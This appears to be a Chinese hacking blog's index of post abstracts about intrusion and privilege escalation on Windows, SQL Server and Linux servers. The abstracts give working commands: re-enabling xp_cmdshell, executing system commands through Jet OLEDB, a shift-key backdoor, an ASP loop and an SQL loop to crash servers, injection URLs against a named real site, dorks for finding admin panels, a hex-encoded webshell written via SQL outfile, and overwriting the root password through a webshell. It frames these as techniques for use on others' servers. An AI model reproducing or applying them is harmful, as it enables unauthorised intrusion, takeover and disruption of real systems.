天黑再动手

摘要： sql2005恢复xp_cmdshellEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;零、----------------- 添加SA用户----------- 阅读全文

摘要： 今日遇到一个问题，提权成功 用户加入了 administrators Remote Desktop Users 两个组，3389登录提示有问题相信有少部分朋友遇到过这种问题，而我是第一次遇到现在以经解决首先，我是建立了SHIFT后门进去以后在如下操作处理办法:1. "控制面板" --> "管理工具" --> "终端服务配置"2. 点击"连接", 右边出现连接项(例如: RDP-Tcp,tcp,Microsoft RDP 5.2)3. 双击要修改的连接项。3. 弹出窗口, 单击"权限" 阅读全文

摘要： 以下方法都以需要SA权限为前提。1, 沙盒模式的变通.原始方法:第一句开启沙盘模式：exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1第二句利用jet.oledb执行系统命令：select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\dnary.mdb',&# 阅读全文

摘要： <%for i = 1 to 100i = 10next%>保存为 *.asp，然后访问该文件，cpu速度上升，然后管理员来重启DB-OWNER权限让服务器重启 sql命令:while 1<9 begin select char(0) end 阅读全文

摘要： 一日从朋友处得到一网站权限，让我帮忙提权。拿到后看了看，C、D盘有只读权限，C:\Documents and Settings\All Users\Documents 可写。 没有装FTP软件和数据库。wscript.shell没有被禁用， 终端端口被改成45678 。试了试从外网连不上45678端口，用LCX也导不出来，本以为是WINDOWS自带的防火墙或者IPSEC。不过防火墙的事拿到系统权限了再搞吧。找了找本地溢出的漏洞，貌似只有MS08067和MS10048，不过在服务器的D盘根目录发现个KB958644.exe ，这个应该是MS08067的补丁，把MS10048.exe传到C:\Do 阅读全文

摘要： 1.判断版本http://www.7747.net/document/advisory/detail.php?id=7and ord(mid(version(),1,1))>51 返回正常，说明大于4.0版本，支持ounion查询2.猜解字段数目,用order by也可以猜，也可以用union select一个一个的猜解http://www.7747.net/document/advisory/detail.php?id=7and 2=4 union select 1,2,3,4,5,6,7,8,9--3.查看数据库版本及当前用户，http://www.7747.net/document 阅读全文

摘要： 察看基本情况：info:xx.com 返回一些基本信息site:xx.com 返回所有与该有关的urllink:xx.com 返回所有与该站做了连接的站site:xx.com filetype:txt 查找TXT文件 其他的依次内推查找后台site:xx.com intext:管理site:xx.com inurl:loginsite:xx.com intitle:后台查看服务器使用的程序site:xx.com filetype:aspsite:xx.com filetype:phpsite:xx.com filetype:jspsite:xx.com filetype:aspx查看上传漏洞： 阅读全文

摘要： mysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;Query OK, 0 rows aff 阅读全文

摘要： 没啥技术含量，一种思路，让某些得到Root权限WebShell的同学可以快点拿到权限。 某日拿到某站WebShell，RedHat(红旗linux)系统，Tomcat程序是Root身份启动的，WebShell当然也拥有Root权限。具体提权思路：1.WebShell直接替换Root密码：/etc/shadow //记得备份2.允许Root通过ssh登陆： 修改：/etc/ssh/sshd_config PermitRootLogin yes #允许Root登陆3.重启ssh服务：service ssh restart4.以Root身份登陆ssh，增加一个用户： useradd applicat 阅读全文

摘要： 系统# uname -a # 查看内核/操作系统/CPU信息# head -n 1 /etc/issue # 查看操作系统版本# cat /proc/cpuinfo # 查看CPU信息# hostname # 查看计算机名# lspci -tv # 列出所有PCI设备# lsusb -tv # 列出所有USB设备# lsmod # 列出加载的内核模块# env # 查看环境变量资源# free -m # 查看内存使用量和交换区使用量# df -h # 查看各分区使用情况# du -sh <目录名> # 查看指定目录的大小# grep MemTotal /proc/meminfo # 阅读全文